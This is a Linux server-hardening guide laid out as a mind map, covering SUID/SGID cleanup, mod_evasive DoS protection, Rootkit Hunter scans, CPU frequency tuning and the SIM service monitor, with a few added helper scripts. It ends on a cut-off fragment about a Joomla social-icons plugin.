    An exploited or hacked server is one that is no longer fully under your control and someone else is now partially using your server for their own purposes.

    You’ll find in this mind map

    What bad guys can do and remedies

    Why a mind map?

    A mind map is a diagram used to visually outline information. Mind maps help you take notes, brainstorm complex problems, and think creatively.

    • Information is summarized efficiently to be usable and accessible,
    • Inter-relationships between the different concepts are clear,
    • It is the most flexible for organizing associative, divergent and convergent thinking (convergent thinking involves aiming for a single, correct solution to a problem, whereas divergent thinking involves creative generation of multiple answers to a set problem).

    You can find the latest version at

    http://linux-compromised-server-checks.waltercedric.com/

  • First let's refresh some definitions...
    set user ID (SUID)

    The SUID permission causes a script to run as the user who is the owner of the script, rather than the user who started it. It is normally considered extremely bad practice to run a program in this way as it can pose many security problems.

    set group ID (SGID)

    The SGID permission causes a script to run with its group set to the group of the script, rather than the group of the user who started it. It is normally considered extremely bad practice to run a program in this way as it can pose many security problems.

    Latest versions of the Linux kernel will even prohibit the running of shell scripts that have SGID/SUID attribute set.

    Use of the SUID bit on binaries (to run with root privileges, aka "setuid bit") MUST be limited to those shown in
    the following list:

    /bin/ping
    /bin/su
    /usr/bin/at
    /usr/bin/chage
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/crontab
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/passwd


    The other binaries that were installed with the SUID bit set MUST have this bit removed. Administrators can still run
    these binaries normally, but they are not available for ordinary users. There are also a number of SGID files on the system that are needed; this may depend on the number of tools or on your distribution. Use Google and query the web for the right list ;-)

    Similarly, the SGID bit MUST NOT be used to give group "root" privileges to any binary.
    To generate a list of all SUID/SGID programs on the system simply run the following command:

    # find / -not -fstype ext3 -prune -o -type f \( -perm -4000 -o -perm -2000 \) -print


    Then, for each file in this list that is not one of the permitted SUID or SGID programs, run the command
    # chmod -s FILE

    to remove the SUID and SGID bits. When done, re-run the find command to verify that the list matches the
    permitted programs.

    I also recommend installing FAF (File Anomaly Finder) on your server to check periodically for files with too many rights or privileges
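
    One way to automate the comparison against the permitted list, as an added example that is not part of the original article. The function names are hypothetical, the allowlist is the SUID list given above, and -xdev (stay on one filesystem) is used in place of the ext3 filter.

```bash
#!/bin/bash
# Added example: report SUID/SGID files that are not on the permitted list.

# Permitted SUID binaries, copied from the list in the article.
ALLOWED_SUID='/bin/ping
/bin/su
/usr/bin/at
/usr/bin/chage
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd'

# list_special_files ROOT
# Print every regular file under ROOT with the SUID (4000) or SGID (2000)
# bit set, one per line. Paths containing newlines are not supported.
list_special_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# unexpected_special_files ROOT [ALLOWLIST]
# Print the SUID/SGID files that are NOT on the allowlist. ROOT is stripped
# from each path, so a mounted disk image or chroot (for example /mnt/suspect)
# can be checked against the same list as the live system (/).
unexpected_special_files() {
    local root="${1%/}" allow="${2:-$ALLOWED_SUID}" path rel
    list_special_files "${root:-/}" | while IFS= read -r path; do
        rel="${path#"$root"}"
        # -F fixed string, -x whole line: /bin/su must not match /bin/sudo
        if ! printf '%s\n' "$allow" | grep -Fxq -- "$rel"; then
            printf '%s\n' "$rel"
        fi
    done
}

# audit_suid ROOT
# Cron-friendly wrapper: one line per unexpected file, exit status 1 if any
# was found and 0 if the system matches the permitted list.
audit_suid() {
    local found
    found="$(unexpected_special_files "$1")"
    if [ -z "$found" ]; then
        return 0
    fi
    printf '%s\n' "$found" | sed 's|^|UNEXPECTED SUID/SGID: |'
    return 1
}
```

    Each reported file is a candidate for chmod -s FILE, or for a new allowlist entry once you have confirmed that your distribution needs it.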

  • mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.

    Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:
    • Requesting the same page more than a few times per second
    • Making more than 50 concurrent requests on the same child per second
    • Making any requests while temporarily blacklisted (on a blocking list)

    This method has worked well in both single-server script attacks as well as distributed attacks, but just like other evasive tools, is only as useful to the point of bandwidth and processor consumption (e.g. the amount of bandwidth and processor required to receive/process/respond to invalid requests), which is why it's a good idea to integrate this with your firewalls and routers for maximum protection.

    This module instantiates for each listener individually, and therefore has a built-in cleanup mechanism and scaling capabilities. Because of this per-child design, legitimate requests are never compromised (even from proxies and NAT addresses) but only scripted attacks. Even a user repeatedly clicking on 'reload' should not be affected unless they do it maliciously. mod_evasive is fully tweakable through the Apache configuration file, easy to incorporate into your web server, and easy to use. from  http://www.zdziarski.com/projects/mod_evasive/

     
    Download the current version of mod_evasive
    #  wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz

    Unpack it
    #  tar xvzf mod_evasive_1.10.1.tar.gz -C /usr/local/src

    Move to that directory
    #  cd /usr/local/src/mod_evasive
    And edit the file mod_evasive20.c; we have to change line 45 to
    #define MAILER  "/bin/mail -t %s"

    We compile the module:
    Apache2
    #  /usr/sbin/apxs2 -cia mod_evasive20.c
    Apache2-Prefork
    #  /usr/sbin/apxs2-prefork -cia mod_evasive20.c

    Now we have to create a config file for mod_evasive:
    # touch /etc/apache2/conf.d/mod_evasive.conf
    and edit it
    # vi /etc/apache2/conf.d/mod_evasive.conf
    content of the file

    Apache2
    LoadModule evasive20_module     /usr/lib/apache2/mod_evasive20.so
    <IfModule mod_evasive20.c>
      DOSHashTableSize 3097
      DOSPageCount 5
      DOSSiteCount 100
      DOSPageInterval 2
      DOSSiteInterval 2
      DOSBlockingPeriod 600
      DOSEmailNotify <your-email-address>
    </IfModule>

    Apache2-Prefork
    LoadModule evasive20_module     /usr/lib/apache2-prefork/mod_evasive20.so
    <IfModule mod_evasive20.c>
      DOSHashTableSize 3097
      DOSPageCount 5
      DOSSiteCount 100
      DOSPageInterval 2
      DOSSiteInterval 2
      DOSBlockingPeriod 600
      DOSEmailNotify <your-email-address>
    </IfModule>


    Restart Apache2 either  with:
    # rcapache2 stop
    # rcapache2 start
    or
    # /etc/init.d/apache2 restart

    mod_evasive also delivers a small Perl script to try a DoS attack on your own web server
    # cd /usr/local/src/mod_evasive
    # perl test.pl

    You should first see HTTP OK responses, but after a few seconds you will only get HTTP error 403, showing that mod_evasive is running correctly!
  • What is mod_evasive?

    mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.

    Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:

    • Requesting the same page more than a few times per second
    • Making more than 50 concurrent requests on the same child per second
    • Making any requests while temporarily blacklisted (on a blocking list)

    Installation

    apt-get install libapache2-mod-evasive
    mkdir /var/log/apache2/mod_evasive
    chown www-data:www-data /var/log/apache2/mod_evasive

    Configuration

    Create a new file

    vi /etc/apache2/conf.d/01_modevasive.conf

    with this content

    <ifmodule mod_evasive20.c>
     DOSHashTableSize 3097
     DOSPageCount 2
     DOSSiteCount 50
     DOSPageInterval 1
     DOSSiteInterval 1
     DOSBlockingPeriod 10
     DOSLogDir /var/log/apache2/mod_evasive
     DOSEmailNotify root@localhost
     DOSWhitelist 127.0.0.1
    </ifmodule>

    Restart Apache to activate the new module

    /etc/init.d/apache2 restart

    Documentation

    • DOSHashTableSize: Size of the hash table used to store the IPs.
    • DOSPageCount: Number of pages allowed per DOSPageInterval.
    • DOSPageInterval: Time in seconds used by DOSPageCount.
    • DOSSiteCount: Number of objects allowed per DOSSiteInterval.
    • DOSSiteInterval: Time in seconds used by DOSSiteCount.
    • DOSBlockingPeriod: Time in seconds that IPs will be banned. If an IP tries to access the server within this period, the count will be restarted.
    • DOSLogDir: Optional. Directory to store the logs. If not specified, /tmp will be used.
    • DOSEmailNotify: Optional. Mail where notifications will be sent.

    • DOSSystemCommand: Optional. Command to execute if an IP is blocked. For example, using iptables:

    DOSSystemCommand "/sbin/iptables -I INPUT -p tcp --dport 80 -s %s -j DROP"
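
    A simplified model of the page and site counters documented above, run over constructed request lines with the thresholds from the two configurations on this page. It is an added example, not mod_evasive's code; the function names and the "time ip uri" input format are assumptions.

```bash
#!/bin/bash
# Added example: replay requests against the documented mod_evasive rules to
# see which ones a given set of thresholds would deny.

# evasive_model PAGE_COUNT PAGE_INTERVAL SITE_COUNT SITE_INTERVAL BLOCKING_PERIOD
# stdin : "<epoch seconds> <client ip> <uri>", sorted by time
# stdout: the same line with 200 (served) or 403 (denied) appended
evasive_model() {
    awk -v page_cnt="$1" -v page_int="$2" -v site_cnt="$3" \
        -v site_int="$4" -v block="$5" '
    # Count one hit for key and report whether the limit for the current
    # interval is exceeded. A new interval starts once the old one is over.
    function over_limit(key, ts, interval, limit) {
        if (!(key in start) || ts - start[key] >= interval) {
            start[key] = ts
            count[key] = 0
        }
        count[key]++
        return count[key] > limit
    }
    {
        ts = $1; ip = $2; uri = $3
        # Rule 3: any request while blocked is denied and restarts the
        # blocking period, as the DOSBlockingPeriod description states.
        if ((ip in blocked_at) && ts - blocked_at[ip] < block) {
            blocked_at[ip] = ts
            print ts, ip, uri, 403
            next
        }
        # Rule 1: same page too often (DOSPageCount per DOSPageInterval).
        page_hit = over_limit("P" SUBSEP ip SUBSEP uri, ts, page_int, page_cnt)
        # Rule 2: too many objects overall (DOSSiteCount per DOSSiteInterval).
        site_hit = over_limit("S" SUBSEP ip, ts, site_int, site_cnt)
        if (page_hit || site_hit) {
            blocked_at[ip] = ts
            print ts, ip, uri, 403
        } else {
            print ts, ip, uri, 200
        }
    }'
}

# blocked_clients: read evasive_model output, print each denied IP once.
blocked_clients() {
    awk '$4 == 403 { print $2 }' | sort -u
}

# Constructed sample traffic (documentation address ranges, not real logs).
sample_requests() {
    cat <<'EOF'
100 203.0.113.7 /index.php
100 203.0.113.7 /index.php
100 203.0.113.7 /index.php
101 198.51.100.9 /index.php
105 203.0.113.7 /about.html
114 203.0.113.7 /index.php
125 203.0.113.7 /index.php
EOF
}
```

    With DOSPageCount 2, DOSPageInterval 1 and DOSBlockingPeriod 10, "sample_requests | evasive_model 2 1 50 1 10" denies the third request of 203.0.113.7 and keeps denying until the client has stayed quiet for 10 seconds; with the looser values 5 2 100 2 600 nothing in the sample is denied.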
  • Rootkit scanner is a scanning tool to ensure, for about 99.9%*, that you're clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:
    • MD5 hash compare
    • Look for default files used by rootkits
    • Wrong file permissions for binaries
    • Look for suspected strings in LKM and KLD modules
    • Look for hidden files
    • Optional scan within plaintext and binary files
    Rootkit Hunter is released as GPL licensed project and free for everyone to use.

    # wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz
    # tar -xzvf rkhunter-1.1.4.tar.gz
    # cd rkhunter
    # ./installer.sh


    Receive an e-mail every day with the Rootkit Hunter results
    For the root user
    # crontab -e
    For any user
    # crontab -e -u username

    and add

    0 3 * * * (/usr/local/bin/rkhunter --checkall 2>&1 | mail -s "chkrootkit output" -c <cc-address-1>,<cc-address-2> <to-address>)

    * The correct path can be found with which rkhunter
    This will run Rootkit Hunter at 3:00 am every day, e-mail the output to <to-address> and send copies to <cc-address-1> and <cc-address-2>.

    Note
    If you ever get a positive alarm, you can try to remove the rootkit, but all professionals would advise you to reinstall the server from scratch and restore a previous backup (that means saving nothing from the server as soon as the rootkit is revealed....)

    Links

    http://www.rootkit.nl/projects/rootkit_hunter.html
  • A rootkit is a set of software tools intended to conceal running processes, files or system data from the operating system. Rootkits have their origin in benign applications, but in recent years have been used increasingly by malware to help intruders maintain access to systems while avoiding detection. Rootkits exist for a variety of operating systems, such as Microsoft Windows, Linux and Solaris. Rootkits often modify parts of the operating system or install themselves as drivers or kernel modules. [WikiPedia]

    Rootkit scanner is a scanning tool which scans for rootkits, backdoors and local exploits by running tests like:
    • MD5 hash compare
    • Look for default files used by rootkits
    • Wrong file permissions for binaries
    • Look for suspected strings in LKM and KLD modules
    • Look for hidden files
    • Optional scan within plaintext and binary files
    Rootkit Hunter is released as GPL licensed project and free for everyone to use. You can download it at
    http://www.rootkit.nl/projects/rootkit_hunter.html

    This tool is just a tar archive with a set of files inside. It is highly recommended to run it from read-only media to avoid tampering attempts by a hacker. Run
    # ./installer.sh
    then
    # rkhunter

    h790663:/var/www/vhosts/waltercedric.com/private # rkhunter

    Rootkit Hunter 1.2.9, Copyright 2003-2006, Michael Boelen

    Under active development by the Rootkit Hunter project team. For reporting
    bugs, updates, patches, comments and questions see: rkhunter.sourceforge.net

    Rootkit Hunter comes with ABSOLUTELY NO WARRANTY. This is free software,
    and you are welcome to redistribute it under the terms of the GNU General
    Public License. See LICENSE for details.


    Valid parameters:
    --checkall (-c)           : Check system
    --createlogfile <file>*   : Create logfile (file is optional, defaults to
                              : /var/log/rkhunter.log)
    --cronjob                 : Run as cronjob (removes colored layout)
    --display-logfile         : Show logfile at end of the output
    --help (-h)               : Show this help
    --nocolors*               : Don't use colors for output
    --report-mode*            : Don't show uninteresting information for reports
    --report-warnings-only*   : Show only warnings (lesser output than --report-mode,
                              : more than --quiet)
    --skip-application-check* : Don't run application version checks
    --skip-keypress (-sk)*    : Don't wait after every test (non-interactive)
    --quick*                  : Perform quick scan (instead of full scan)
    --quiet*                  : Be quiet (only show warnings)
    --update                  : Run update tool and check for database updates
    --version                 : Show version and quit
    --versioncheck            : Check for latest version

    --bindir <bindir>*        : Use <bindir> instead of using default binaries
    --configfile <file>*      : Use different configuration file
    --dbdir <dir>*            : Use <dbdir> as database directory
    --rootdir <rootdir>*      : Use <rootdir> instead of / (slash at end)
    --tmpdir <tempdir>*       : Use <tempdir> as temporary directory

    Explicit scan options:
    --allow-ssh-root-user*    : Allow usage of SSH root user login
    --disable-md5-check*      : Disable MD5 checks
    --disable-passwd-check*   : Disable passwd/group checks
    --scan-knownbad-files*    : Perform besides 'known good' check a 'known bad' check
    --check-deleted           : Perform 'deleted files' check
    --check-listen            : Perform 'listening applications' check

    Multiple parameters are allowed
    *) Parameter can only be used with other parameters



    False alarms:

    * Filesystem checks
       Checking /dev for suspicious files...                      [ OK ]
       Scanning for hidden files...                               [ Warning! ]
    ---------------
    /etc/.pwd.lock /dev/.udevdb
    ---------------
    Please inspect:  /dev/.udevdb (directory)


    /dev normally contains only device names and hence udev stores its private configuration information in a hidden directory. Rkhunter
    complains because rootkits are known to create such directories.
     
  • Cpufreqd is a small daemon to adjust cpu speed and voltage (and not only) for kernels using any of the cpufreq drivers available. Cpufreqd is not a userspace governor.

    Cpufreqd allows you to apply governor profiles from rules based on battery level, ac status, temperature (ACPI or sensors), running programs, cpu usage and (maybe) more. You can also change your nforce FSB clock and video card frequency (NVidia only) or execute arbitrary commands when a specific rule is applied.

    The nice thing with Linux is that you have total, absolute, full control!

    Defining new profiles

    Look for cpufreqd.conf

    My profile settings are in /etc/sysconfig/powersave

    Example of a profile

    [Profile]
    name=On Demand High
    minfreq=1998000
    maxfreq=2331000
    policy=ondemand
    [/Profile]

    Defining Rules:

    Examples of the flexibility offered:

    • If the temperature is too high, throttle the CPU speed lower
      acpi_temperature=55-80
    • If some applications are running, let's say your anti-virus, you may want more CPU:
      programs=drweb
      cpu_interval=0-100

    There are a lot more settings; as usual, just read the manual

    # man cpufreqd.conf

    Querying the CPU

    To list all available profiles, just run as root

    # cpufreqd-get -l

    or

    # cpufreq-info

    analyzing CPU 0:
      driver: powernow-k8
      CPUs which need to switch frequency at the same time: 0
      hardware limits: 1000 MHz - 2.00 GHz
      available frequency steps: 2.00 GHz, 1.80 GHz, 1000 MHz
      available cpufreq governors: ondemand, userspace, powersave, performance
      current policy: frequency should be within 2.00 GHz and 2.00 GHz.
                      The governor "ondemand" may decide which speed to use
                      within this range.
      current CPU frequency is 2.00 GHz (asserted by call to hardware).

    Changing the CPU speed

    Now let's change the speed. As a server, I don't see any reason to try to minimize the speed except in order to save electricity. The profile onDemand should be able to provide the best compromise, changing CPU speed based on server load and thus be more green. For the sake of this article, I will forbid the CPU to downgrade its speed...
    Attention: you'll have to respect the hardware limits of your processor. In my case I currently use an AMD K8 Opteron 146 rated at a maximum of 2 GHz

    So depending on your processor, you'll have to either

    • Query the Internet to find the CPU speed range, or
    • Use cpufreq-info, which is for sure the fastest and safest, or
    • Extract the info from where it is stored (for every CPU):
      cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies

    I was shocked to discover that my current max speed was set at 1 GHz, leading to a server consuming 80 to 250% of CPU load.

    By running the cpufreq-set command, I force the system to never go below 2 GHz.

    cpufrequtils 0.4: cpufreq-set (C) Dominik Brodowski 2004
    Report errors and bugs to [email address hidden], please.
    Usage: cpufreq-set [options]
    Options:
      -c CPU, --cpu CPU        number of CPU where cpufreq settings shall be modified
      -d FREQ, --min FREQ      new minimum CPU frequency the governor may select
      -u FREQ, --max FREQ      new maximum CPU frequency the governor may select
      -g GOV, --governor GOV   new cpufreq governor
      -f FREQ, --freq FREQ     specific frequency to be set. Requires userspace
                               governor to be available and loaded
      -h, --help           Prints out this screen

    Notes:
    1. Omitting the -c or --cpu argument is equivalent to setting it to zero
    2. The -f FREQ, --freq FREQ parameter cannot be combined with any other parameter
       except the -c CPU, --cpu CPU parameter
    3. FREQuencies can be passed in Hz, kHz (default), MHz, GHz, or THz
       by postfixing the value with the wanted unit name, without any space
       (FREQuency in kHz =^ Hz * 0.001 =^ MHz * 1000 =^ GHz * 1000000).

    # cpufreq-set -c 0 -d 2GHz

    The BogoMips make a jump and the server load is also greatly reduced; this can be confirmed by executing:

    # cat /proc/cpuinfo

    processor       : 0
    vendor_id       : AuthenticAMD
    cpu family      : 15
    model           : 39
    model name      : AMD Opteron(tm) Processor 146
    stepping        : 1
    cpu MHz         : 1995.468
    cache size      : 1024 KB
    fdiv_bug        : no
    hlt_bug         : no
    f00f_bug        : no
    coma_bug        : no
    fpu             : yes
    fpu_exception   : yes
    cpuid level     : 1
    wp              : yes
    flags           : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov
                      pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext
                      fxsr_opt lm 3dnowext 3dnow pni lahf_lm
    bogomips        : 3994.29

    Back to my Linux desktop

    I really enjoy using OpenSuse 11.1 powered by KDE 4.2, changing CPU settings has never been easier thanks to the applet KPowersave

    KPowersave is the KDE front end for power management. It provides battery monitoring, suspend/ standby triggers and many more power management features for KDE (and GNOME).

    You'll find the same applet in all versions of KDE

    KPowersave is great and very intuitive in KDE 4.2
  • SIM is a system and services monitor for ‘SysVinit’ systems. It is designed to be intuitive and modular in nature, and to provide a clean and informative status system.
    It does this by consistently verifying that services are online, load averages are in check, and log files are at reasonable sizes. Many other SIM modules sport different and in-depth features to bring a well rounded tool to your disposal to stop otherwise common issues daunting internet hosts.

    Features:
    - Service monitoring of HTTP, FTP, DNS, SSH, MYSQL & more
    - Event tracking and alert system
    - Auto restart ability for downed services
    - Checks against network sockets & process list to ensure services are online
    - Advanced HTTP service monitoring, to prevent commonly encountered issues
    - System load monitor with customizable warnings & actions
    - Ability to auto restart system with definable critical load level
    - Priority change configurable for services, at warning or critical load level
    - Informative command line status display
    - Easily customizable configuration file
    - Auto configuration script
    - Auto cronjob setup feature
    - Simple & Informative installation script
    - Integrated auto-update feature
    - And more...

    From http://www.r-fx.org/sim.php

    Installation is once again straightforward:

    # wget http://www.r-fx.ca/downloads/sim-current.tar.gz
    # tar xvf sim-current.tar.gz
    # cd sim-*

    The installation of sim is easily accomplished, a simple shell script named 'setup' is included with SIM. Running this script will tend to all the install tasks for SIM.

    # ./setup -i
    -i     Install
    -q     Quick install
    -u     Uninstall
    -c     Install/Uninstall cronjob

    Press "SPACE" to go to the next page when you read the licence.

    Press "RETURN" to quit

    The readme is then displayed, press "SPACE", then "RETURN"

    Ideally once SIM is configured it is best to run from a cronjob. The 'setup'
    SIM 2.5-4 <[email address hidden]>
    Creating installation paths:            [##########]
    Installing SIM 2.5-4 to /usr/local/sim:         [##########]

    SIM 2.5-4 installation completed, related notes:
    Executable:             /usr/local/sim/sim
    Executable symlink:     /usr/local/sbin/sim
    Config file:            /usr/local/sim/conf.sim
    Autoconf script:        /usr/local/sim/autoconf
    Autoconf symlink:       /usr/local/sbin/sim-autoconf
    Cronjob setup:          /usr/local/sim/sim -j

    SIM 2.5-4 must now be configured for use on this system, Press
    return to run the autoconf script (/usr/local/sim/autoconf).

    SIM 2.5-4 Auto-Config Script

    All questions default to value in brackets if no answer is given. If you
    make a typo during the autoconf process, hit CTRL+C (^C) to abort and
    rerun the autoconf script (/usr/local/sim/autoconf).

    The below are general configuration options for SIM:
    press return to continue...

    Where is SIM installed ?
    [/usr/local/sim]:
    "RETURN"

    Where should the sim.log file be created ?
    [/usr/local/sim/sim.log]:
    "RETURN"

    Max size of sim.log before rotated ? (value in KB)
    [128]:
    "RETURN"

    What is the location of your kernel log ?
    Found kernel log at /var/log/messages
    "RETURN"

    Where should alerts be emailed to ? (e.g: root, user@domain)
    [root]: <your external email address>
    "RETURN" enter an external email, not one from the mail server domain!

    Disable alert emails after how many events, to avoid email flood ?
    (Note: events stats are cleared daily)
    [8]:
    "RETURN"

    The below are configuration options for Service modules:
    press return to continue...

    Auto-restart services found to be offline ? (true=enable, false=disable)
    [true]:
    "RETURN"

    Enforce laxed service checking ? (true=enable, false=disable)
    [true]:
    "RETURN"

    Disable auto-restart after how many downed service events ?
    (Note: events stats are cleared daily)
    [10]:
    "RETURN"

    Enable FTP service monitoring ? (true=enable, false=disable)
    [false]:
    "RETURN"

    Name of the FTP service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as proftpd

    TCP/IP port that FTP operates on ?
    [21]:
    "RETURN"

    Path to FTP service init script ?
    [/etc/init.d/proftpd]:
    "RETURN"

    Enable HTTP service monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    Name of the HTTP service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as httpd

    TCP/IP port that HTTP operates on ?
    [80]:
    "RETURN"

    Path to HTTP service init script ?
    [/etc/init.d/httpd]:
    "RETURN"

    Enable DNS service monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    Name of the DNS service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as named


    TCP/IP port that DNS operates on ?
    Found service port as 53

    Path to DNS service init script ?
    Found service init script at /etc/init.d/named

    Enable SSH service monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    Name of the SSH service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as sshd

    TCP/IP port that SSH operates on ?
    Found service port as 22
    "RETURN"

    Path to SSH service init script ?
    Found service init script at /etc/init.d/sshd

    Enable MYSQL service monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    Name of the MYSQL service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as mysqld

    TCP/IP port that MYSQL operates on ?
    Found service port as 3306

    Path to MYSQL service init script ?
    Found service init script at /etc/init.d/mysql

    Enable SMTP service monitoring ? (true=enable, false=disable)
    [false]:   
    "RETURN"

    Enable XINET service monitoring ? (true=enable, false=disable)
    [false]:true

    Name of the XINET service as appears in 'ps' ?
    Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
    Found service name as xinetd

    TCP/IP port that any XINET service operates on (e.g: pop3, 110) ?
    [110]:
    "RETURN"

    In computer networking, xinetd, the eXtended InterNET Daemon, is an open-source daemon which runs on many Unix systems and manages Internet-based connectivity. It offers a more secure extension to or version of inetd, the Internet daemon.

    xinetd features access control mechanisms such as TCP Wrapper ACLs, extensive logging capabilities, and the ability to make services available based on time. It can place limits on the number of servers that the system can start, and has deployable defence mechanisms to protect against port scanners, among other things. from WikiPedia

    Path to XINET service init script ?   see www.xinetd.org/faq.html and
    Found service init script at /etc/init.d/xinetd

    Enable ENSIM service monitoring ? (true=enable, false=disable)
    [false]:
    "RETURN"

    Enable PGSQL service monitoring ? (true=enable, false=disable)
    [false]:
    "RETURN"

    The below are configuration options for Service Specific features:
    press return to continue...
    After an unclean HTTP shutdown, semaphore array's may remain allocated
    and cause the service to fall into a looping restart cycle. Using this
    feature clears semaphore arrays on HTTP restart.
    Enable semaphore cleanup ?
    [false]:
    "RETURN"

    This is an implamented feature in the http module, its purpose is to
    determine if/when the apache server locks up or otherwise stops
    responding.
    Enable URL aware monitoring ?
    [false]:
    "RETURN"

    HTTP log files can grow large and cause the service to crash
    (segfault), this feature will keep the main HTTP logs incheck.
    Enable HTTP log monitor ?
    [false]:true
    "RETURN"

    What is the location of your HTTP servers, log files ?
    (should point to a directory, not file)
    [/var/log/httpd]:/var/log/apache2

    Max size of HTTP log files, before cleared ? (value in MB)
    [300]:
    "RETURN"

    MySQL uses a /tmp symlink of its mysql.sock socket file. This
    feature verifies that the symlink exists from the main mysql.sock
    file, and if not it is recreated.
    Enable MySQL Socket correction ?
    [false]:
    "RETURN"

    The below are configuration options for System modules:
    press return to continue...

    Enable NETWORK monitoring ? (true=enable, false=disable)
    [false]:true
    "RETURN"

    interface to monitor ?
    [eth0]:
    "RETURN"

    Path to NETWORK init script ?
    Found service init script at /etc/init.d/network

    Enable LOAD monitor ? (true=enable, false=disable)
    [false]:
    "RETURN"

    Configuration completed, saving conf.sim...
    Done, conf.sim saved to /usr/local/sim.

    SIM (System Integrity Monitor) is now configured. Add it as a cron job:

    # ./setup -c
    SIM 2.5-4
    Removed SIM cronjob.
    # ./setup -c
    SIM 2.5-4
    Installed SIM cronjob.


    If everything goes well, you can check the installation by typing:

    # /etc/init.d/mysql stop

    This stops the MySQL daemon. You will receive an email at the same time, showing that MySQL has been stopped and restarted:

    System integrity monitor on xxxxx has taken action in responce to an event. Recent event logs are enclosed below for your inspection. There has been 1 events today, if an average of 8 events is reached, e-mail alerts will be terminated for the duration of the day.

    - Events Summary:
    Total event count:   1
    Average event count: 0

    - Service Summary:
    FTP       [online - 0 events]
    HTTP      [online - 0 events]
    DNS       [online - 0 events]
    SSH       [online - 0 events]
    MYSQL     [restart success - 1 events]
    XINET     [online - 0 events]

    - System Summary:
    NETWORK   [eth0 - online - 0 events]

    - SIM Log:
    [07/21/07 12:10:01]: touched log file.
    [07/21/07 12:10:01]: sim.dat not found, created.
    [07/21/07 12:10:01]: no .chk modules enabled.
    [07/21/07 12:15:03]: no .chk modules enabled.
    [07/21/07 12:20:01]: no .chk modules enabled.
    [07/21/07 12:25:01]: NETWORK is online.
    [07/21/07 12:25:01]: FTP service is offline.
    [07/21/07 12:25:01]: FTP service is offline.
    [07/21/07 12:25:01]: FTP restart failed, could not find /etc/init.d/proftpd.
    [07/21/07 12:25:01]: FTP restart failed, could not find /etc/init.d/proftpd.
    [07/21/07 12:25:01]: HTTP service is online.
    [07/21/07 12:25:01]: DNS service is online.
    [07/21/07 12:25:01]: SSH service is online.
    [07/21/07 12:25:01]: MYSQL service is online.
    [07/21/07 12:25:01]: XINET service is online.
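
The SIM log in the alert above is also where a misconfigured module shows up: here FTP monitoring points at an init script that does not exist, so the restart can never succeed. The following bash/awk summary of that log format is an added example, not part of SIM or of the original page; the function names `sim_summary` and `sim_problems` are hypothetical and the sample lines are constructed from the log shown above.

```bash
# Added example (not part of SIM): summarise a SIM log whose lines look like
#   [MM/DD/YY HH:MM:SS]: message
# Constructed sample input, shaped like the "SIM Log" section of the alert.
sample_log() {
  printf '%s\n' \
    '[07/21/07 12:20:01]: no .chk modules enabled.' \
    '[07/21/07 12:25:01]: NETWORK is online.' \
    '[07/21/07 12:25:01]: FTP service is offline.' \
    '[07/21/07 12:25:01]: FTP service is offline.' \
    '[07/21/07 12:25:01]: FTP restart failed, could not find /etc/init.d/proftpd.' \
    '[07/21/07 12:25:01]: FTP restart failed, could not find /etc/init.d/proftpd.' \
    '[07/21/07 12:25:01]: HTTP service is online.' \
    '[07/21/07 12:25:01]: MYSQL service is online.'
}

# sim_summary: read a log on stdin and print "SERVICE STATE [missing=PATH]",
# keeping the worst state seen per service (restart-failed > offline > online).
sim_summary() {
  awk '
    !/^\[[0-9][0-9]\/[0-9][0-9]\/[0-9][0-9] [0-9:]+\]: / { next }  # not a log line
    seen[$0]++ { next }                    # identical repeated entry: count once
    {
      msg = substr($0, index($0, "]: ") + 3)
      split(msg, w, " "); svc = w[1]
      if      (msg ~ / restart failed/) { rank = 3; st = "restart-failed" }
      else if (msg ~ / is offline\.$/)  { rank = 2; st = "offline" }
      else if (msg ~ / is online\.$/)   { rank = 1; st = "online" }
      else next                            # housekeeping line, no service state
      if (rank > best[svc]) { best[svc] = rank; state[svc] = st }
      # "could not find PATH." means the configured init script does not exist.
      if (rank == 3 && match(msg, /could not find [^ ]+/)) {
        path = substr(msg, RSTART + 15, RLENGTH - 15); sub(/\.$/, "", path)
        missing[svc] = path
      }
    }
    END {
      for (s in state) {
        line = s " " state[s]
        if (s in missing) line = line " missing=" missing[s]
        print line
      }
    }
  ' | LC_ALL=C sort
}

# sim_problems: only the services whose worst state was not "online".
sim_problems() { sim_summary | awk '$2 != "online"'; }

sample_log | sim_problems
```

Pipe the real SIM log into `sim_problems` in place of `sample_log`; a `missing=` field means the init script path configured for that service should be corrected in conf.sim.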

  • joomla_cms

    This small plugin automatically adds a set of social icons to every article, letting your readers increase your social ranking. It support